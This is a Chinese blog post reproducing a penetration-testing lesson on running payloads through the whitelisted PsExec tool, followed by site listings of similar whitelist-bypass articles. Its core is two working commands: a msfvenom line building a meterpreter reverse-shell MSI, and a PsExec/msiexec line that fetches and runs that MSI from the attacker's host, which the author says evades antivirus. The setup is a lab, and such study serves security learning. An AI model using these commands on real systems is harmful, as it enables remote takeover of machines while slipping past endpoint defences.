对亮神基于白名单 PsExec 执行 payload 第十三季复现

最新推荐文章于 2021-09-15 11:14:37 发布
最新推荐文章于 2021-09-15 11:14:37 发布
阅读量345 收藏 1
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89879771
版权

0x00 PsExec 简介:

微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性

0x01 环境

攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机
在这里插入图片描述
靶机
在这里插入图片描述

PsExec.exe -d -s msiexec.exe /q /i http://192.168.5.100/shellcode.msi

shell弹回
在这里插入图片描述

0x03 shellcode.msi

在这里插入图片描述

msfvenom -a  x86 --platform windows -p  windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f msi > shellcode.msi

启用80监听
在这里插入图片描述

0x04 总结

不过AV。psexec.exe需下载,解压在命令行运行即可,地址
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_基于白名单PsExec执行payload第十三季.html

cxk331
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
micro8#Gitbook#83_基于白名单PsExec执行payload第十三1
07-25
PsExec简介:微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet
PAExec:远程执行,如PsExec
04-29
PAExec是免费的,可重新分发的开源软件,等效于Microsoft流行的PsExec应用程序: 文献资料 PAExec主页显示所有命令行选项。 执照 基本上,任何人都可以将该软件用于私人,公共或商业用途,包括将其用作分布式商业...
渗透沉思录 - 转自亮神
易编橙 · 终身成长社群,相遇已是上上签!
07-16 340
声明:本文内容来自亮神-gitbook-渗透沉思录[还有一文,"渗透测试的本质"] 内容虽不多,但是通读之后受益良多,对自身的思考,学习层面及技术层面的思考,希望大家也能有所得吧。
hnu 暑期实训之回文串
qq_30747875的博客
09-15 258
文章目录题目思路AC代码 题目 思路 回文串首先可以对所给的字符串判断一下看看是不是回文串,如果是就直接输出0;对于不是回文串的,我们先来观察一段回文串 "abcba" 对于给出的串"abc"的话,我们可以先对其逆序得到"cba",然后将它的后i位接进去,就可以发现答案会是2.一定不能正序接入,因为得优先满足回文串的条件:首末位相等。 AC代码 #include <bits/stdc++.h> using namespace std; bool reverse_string(string
对亮基于白名单 Compiler.Exe 执行 Payload 第六复现
cxk
05-03 503
0x00 Compiler.Exe简介 Microsoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 靶机装有数字AV 0x02 复现 A 攻击机配置监听 靶机执行 ...
404
倾旋
01-05 349
layout: error title: 404 Not Found permalink: /404 这里是引用 Error The page you are looking for either doesn’t exist or is not here anymore. Click [here]({{ site.baseurl }}/) to go back to the home p...
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四.docx
第八十三课:基于白名单PsExec执行payload第十三.docx
09-15
第八十三课:基于白名单PsExec执行payload第十三.docx
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
我们将使用 exploit/windows/smb/psexec 模块作为示例,演示如何自定义 payload 并将其与第三方框架集成,例如 Veil-Evasion。 首先,我们需要了解 exploit/windows/smb/psexec 模块的选项。在 MSF 中,我们可以...
PsExec64.zip
07-04
.提升cmd权限为SYSTEM 在windows服务器中tomcat以SYSTEM权限启动,JDK自带工具(jmap、jstack、...PsExec64.exe /s cmd 如果不成功,则执行下条命令 PsExec64.exe \\127.0.0.1 -u 服务器用户名 -p 服务器密码 /s cmd
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
05-09
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
对亮基于白名单zipfldr.dll执行payload第十八复现
cxk
05-06 299
0x00 zipfldr.dll简介: zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。 0x01 环境 攻击机 kali 192.168.5.102 靶机 win7 192.168.5.101 装有av 0x02复现 攻击机 靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe 弹回 0x03 sh...
对亮基于白名单Regsvr32 执行 payload 第九复现
cxk
05-03 574
0x00 Regsvr32简介: Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
对亮基于白名单 Msbuild.exe 执行 payload 第一复现
cxk
05-01 711
0x00 MSBuild简介: MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩...
php安全新闻早八点-高级持续渗透-第二关于后门补充一
Micropoor
12-25 2990
文章转载于:https://micropoor.blogspot.hk/2017/12/php_24.html 这次继续围绕第一篇,第一关于后门:https://micropoor.blogspot.hk/2017/12/php.html 做整理与补充。在深入一步细化demo notepad++。 后门是渗透测试的分水岭,它分别体现了攻击者对目标机器的熟知程度,环境,编程语言,了
Psexec.exe用法
01-05 5415
Runtime.getRuntime().exec( "Netsh interface ip set address local static 10.0.0.9 255.0.0.0 10.0.0.1 1");local - 接口名称static - 设置使用本地静态配置设置IP地址。 10.0.0.9 - 要修改的ip255.0.0.0 - 子网掩码10.0.0.1 - 网关,如果为none: ...
对亮基于白名单Installutil.exe 执行 payload 第二复现
cxk
05-02 631
0x00 Installer简介 Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 she...
渗透测试-基于白名单执行payload--Pcalua
weixin_30662109的博客
05-03 535
0x01 Pcalua简介 Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。 说明:Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别 Windows 7 默认位置: C:\Windows\System32\pcalua.exe 0x02 复现 攻...
psexec
最新发布
05-29
PsExec是Sysinternals Suite中的一款命令行实用程序,它允许用户在远程计算机上运行命令和进程。通过PsExec,用户可以在远程计算机上运行命令提示符、PowerShell、Windows管理工具、Windows服务等。 以下是使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值